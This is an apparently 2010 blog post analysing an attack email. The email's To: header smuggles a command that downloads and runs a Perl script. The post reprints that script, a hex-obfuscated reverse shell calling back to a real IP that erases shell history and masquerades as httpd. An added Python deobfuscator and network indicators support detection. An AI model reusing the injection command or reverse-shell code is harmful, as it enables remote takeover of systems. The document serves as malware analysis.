============================================================
Remote Attack Script uses hexadecimal obfuscation
============================================================
-Ian! D. Allen - idallen@idallen.ca - www.idallen.com

On Sunday March 14, 2010 I saw this new attack in my root mailbox (five
times) at home:

---------------------------
From blue@dick.com Sun Mar 14 19:07:30 2010
To: "root+GET http://www.linux-echo.de/.x/p.txt ; perl p.txt"
Received: from bluedick (mail.modaintl.com [68.236.170.186])
        Sun, 14 Mar 2010 19:07:30 -0400 (EDT)
---------------------------

The attacking email came from mail.modaintl.com, which is a Verizon
address that appears to be in New York City.  The domain is registered
to Moda International Marketing in PA, USA.

The file being fetched is this Perl script:

    http://www.linux-echo.de/.x/p.txt

Host linux-echo.de is registered to a "Melanie Pavic" in
Schlangen-Oesterholz.

If I fetch that p.txt file from www.linux-echo.de in Germany, I get the
Perl script below that tries to set up a remote shell connection from my
machine to Australia using Python.  The script did not execute.

The attack script uses hexadecimal obfuscation to hide the file name
used, the IP address, and the port number so that they aren't visible
as readable ASCII characters in the script.  Can you decode the
hexadecimal?

---------------------------
# Three hex-obfuscated strings: a file name, a callback address, a port.
$File="\x2f\x74\x6d\x70\x2f\x73\x65\x73\x73\x5f\x65\x30\x30\x64\x64\x34\x6c\x62\x6f\x32\x61\x64\x32\x37\x35\x38\x6e\x39\x66\x63\x36\x34\x31\x65\x34\x37\x63\x64\x37\x36\x78\x39";
$perm="\x32\x30\x33\x2e\x35\x39\x2e\x31\x32\x33\x2e\x31\x31\x34";
$port="\x38\x30";
# Process name the shell will masquerade under.
$fake="/usr/sbin/httpd";
# An alternate callback address may be given on the command line.
if ($ARGV[0]) { $perm=$ARGV[0]; }
# Outbound TCP connection to $perm:$port (a "reverse" shell).
$proto = Getprotobyname('tcp') || die("[x] Error: Getprotobyname()\n\n");
Socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[x] Error: Socket()\n");
if (!Connect(SERVER, Pack "SnA4x8", 2, $port, Inet_aton($perm))) { die("! NO.\n"); }
if (!Fork( )) {
    # Child: disguise argv[0], then wire stdin/stdout/stderr to the socket.
    $0=$fake."\0"x16;;
    Open(STDIN,">&SERVER");
    Open(STDOUT,">&SERVER");
    Open(STDERR,">&SERVER");
    # Anti-forensics: no shell history for this session, remove old history.
    System("unset HISTFILE;unset HISTSIZE;unset HISTFILESIZE;HISTFILE=/dev/null;rm -rf /tmp/.bash_*");
    # Fingerprint the host for the attacker.
    System("echo;echo \"\e[1;29m\" Machine: `uname -a`");
    System("echo \"\e[1;34m\"");
    System("echo -----------------------------------------------------------------------------------");
    System("w");
    System("echo -----------------------------------------------------------------------------------");
    if (-f $File) { System("echo [x] xeQted ; cat $File"); }
    # Which download tools and compilers are available?
    if ((-x "/usr/bin/wget") && (-e "/usr/bin/wget")) { System("echo -ne \"\e[05;32m[Wget: Yes]\e[00m\" "); }
    if ((-x "/usr/bin/curl") && (-e "/usr/bin/curl")) { System("echo -ne \"\e[05;32m[Curl: Yes]\e[00m\" "); }
    if ((-x "/usr/bin/fetch") && (-e "/usr/bin/fetch")) { System("echo -ne \"\e[05;32m[Fetch: Yes]\e[00m\" "); }
    if ((-x "/usr/bin/GET") && (-e "/usr/bin/GET")) { System("echo -ne \"\e[05;32m[GET: Yes]\e[00m\" "); }
    if ((-x "/usr/bin/lwp-download") && (-e "/usr/bin/lwp-download")) { System("echo -ne \"\e[05;32m[LWP: Yes]\e[00m\" "); }
    if ((-x "/usr/bin/lynx") && (-e "/usr/bin/lynx")) { System("echo -ne \"\e[05;32m[Lynx: Yes]\e[00m\";echo "); }
    if ((-x "/usr/bin/gcc") && (-e "/usr/bin/gcc")) { System("echo -ne \"\e[05;32m[GCC: Yes]\e[00m\" "); }
    if (-e "/etc/udev/udev.conf") { System("echo -ne \"\e[05;32m UDEV Detected.\e[00m\" "); }
    if ((-x "/usr/bin/suidperl") && (-e "/usr/bin/suidperl")) { System("echo -ne \"\e[05;32m SuidPerl Detected.\e[00m\" "); }
    System("echo \"\e[1;32m\";id");
    # Spawn a pty-backed bash through Python; fall back to plain /bin/sh.
    System("echo;echo;echo + Opening /bin/bash complex shell...");
    Open pySHELL, ">/tmp/shell.py" or die $!;
    print pySHELL 'import pty; pty.spawn(\'/bin/bash\')';
    close pySHELL;
    System("python /tmp/shell.py");
    System("echo ! /bin/bash failed.");
    System("echo + /bin/sh Shell Success full.");
    exec {'/bin/sh'} $fake . "\0" x4;
    unlink($File);
    exit(0);
}
print "+ oK.\n";
---------------------------

-- 
| Ian! D. Allen  -  idallen@idallen.ca  -  Ottawa, Ontario, Canada
| Home Page: http://idallen.com/   Contact Improv: http://contactimprov.ca/
| College professor (Free/Libre GNU+Linux) at: http://teaching.idallen.com/
| Defend digital freedom: http://eff.org/ and have fun: http://fools.ca/
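Editor's note: the three "\xHH" strings decode to a PHP-style session file
name, /tmp/sess_e00dd4lbo2ad2758n9fc641e47cd76x9 ($File), the address
203.59.123.114 ($perm) and the port 80 ($port), so the child process the
script forks calls back to 203.59.123.114:80, wires its standard streams
to that socket, disables shell history, fingerprints the host, and hands
the attacker a pty-backed bash (or plain /bin/sh) disguised in the
process table as /usr/sbin/httpd.  As reproduced in the listing the Perl
builtins are capitalized (Getprotobyname, Socket, Connect, Fork, Open,
System); Perl has no functions by those names, so the listing will not
run if pasted as-is.

The Python 3 below is an added example for this page, not code from the
original post or from p.txt.  It takes the four string assignments
copied verbatim from the listing (the only input it needs, embedded as a
constructed string), expands the \xHH escapes, flags which values were
hidden, produces a readable copy of those lines, and rebuilds the 16-byte
struct sockaddr_in that Perl's pack "SnA4x8" builds for Connect().  The
function and constant names (decode_perl_hex, extract_strings,
deobfuscate_script, callback_sockaddr, OBFUSCATED_SCRIPT) are this
example's own.

```python
import re
import socket
import struct

# Constructed input for this example: the four string assignments copied
# from the p.txt listing above.  A raw string keeps each "\x2f" as the four
# characters backslash-x-2-f, exactly as they sit in the Perl source.
OBFUSCATED_SCRIPT = r'''
$File="\x2f\x74\x6d\x70\x2f\x73\x65\x73\x73\x5f\x65\x30\x30\x64\x64\x34\x6c\x62\x6f\x32\x61\x64\x32\x37\x35\x38\x6e\x39\x66\x63\x36\x34\x31\x65\x34\x37\x63\x64\x37\x36\x78\x39";
$perm="\x32\x30\x33\x2e\x35\x39\x2e\x31\x32\x33\x2e\x31\x31\x34";
$port="\x38\x30";
$fake="/usr/sbin/httpd";
'''

# $name="body";  -- the body may hold backslash escapes but no bare quote.
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')
# Perl's \x escape takes one or two hex digits.
HEX_ESC_RE = re.compile(r'\\x([0-9A-Fa-f]{1,2})')


def decode_perl_hex(body: str) -> str:
    """Expand every \\xHH escape in a Perl double-quoted string body.

    Only the hex escape is handled, because it is the only one the hidden
    strings use; any other text is passed through untouched.
    """
    return HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), body)


def is_hex_obfuscated(body: str) -> bool:
    """True when the body is nothing but \\xHH escapes (fully hidden)."""
    return bool(body) and HEX_ESC_RE.sub("", body) == ""


def extract_strings(script: str) -> dict:
    """Map each $name="..."; assignment to (decoded value, was_hidden)."""
    return {name: (decode_perl_hex(body), is_hex_obfuscated(body))
            for name, body in ASSIGN_RE.findall(script)}


def deobfuscate_script(script: str) -> str:
    """Return the script text with every hex-hidden string made readable.

    Good enough for reading a listing; it does not re-escape quotes or
    backslashes that a decoded value might contain (none here do).
    """
    return ASSIGN_RE.sub(
        lambda m: '$%s="%s";' % (m.group(1), decode_perl_hex(m.group(2))),
        script)


def callback_sockaddr(ip: str, port: int) -> bytes:
    """Rebuild the argument the script's Connect() call is given.

    Perl's  pack "SnA4x8", 2, $port, inet_aton($perm)  is a struct
    sockaddr_in: native-order family (2 = AF_INET), network-order port,
    the 4-byte IPv4 address, then 8 zero bytes of padding.
    """
    return (struct.pack("H", 2)            # S : native unsigned short
            + struct.pack("!H", port)      # n : 16-bit big-endian
            + socket.inet_aton(ip)         # A4: packed dotted quad
            + b"\0" * 8)                   # x8: eight null bytes


if __name__ == "__main__":
    strings = extract_strings(OBFUSCATED_SCRIPT)
    for name, (value, hidden) in strings.items():
        print("%-5s %-7s %s" % (name, "hidden" if hidden else "plain", value))
    ip, port = strings["perm"][0], int(strings["port"][0])
    print("callback target: %s:%d  sockaddr_in=%s"
          % (ip, port, callback_sockaddr(ip, port).hex()))
```

Running it prints the three hidden values beside the one plain string
and the hex of the sockaddr_in; the port bytes 00 50 and address bytes
cb 3b 7b 72 are what to look for in a packet capture or a netstat
listing when checking whether a host has already made this connection.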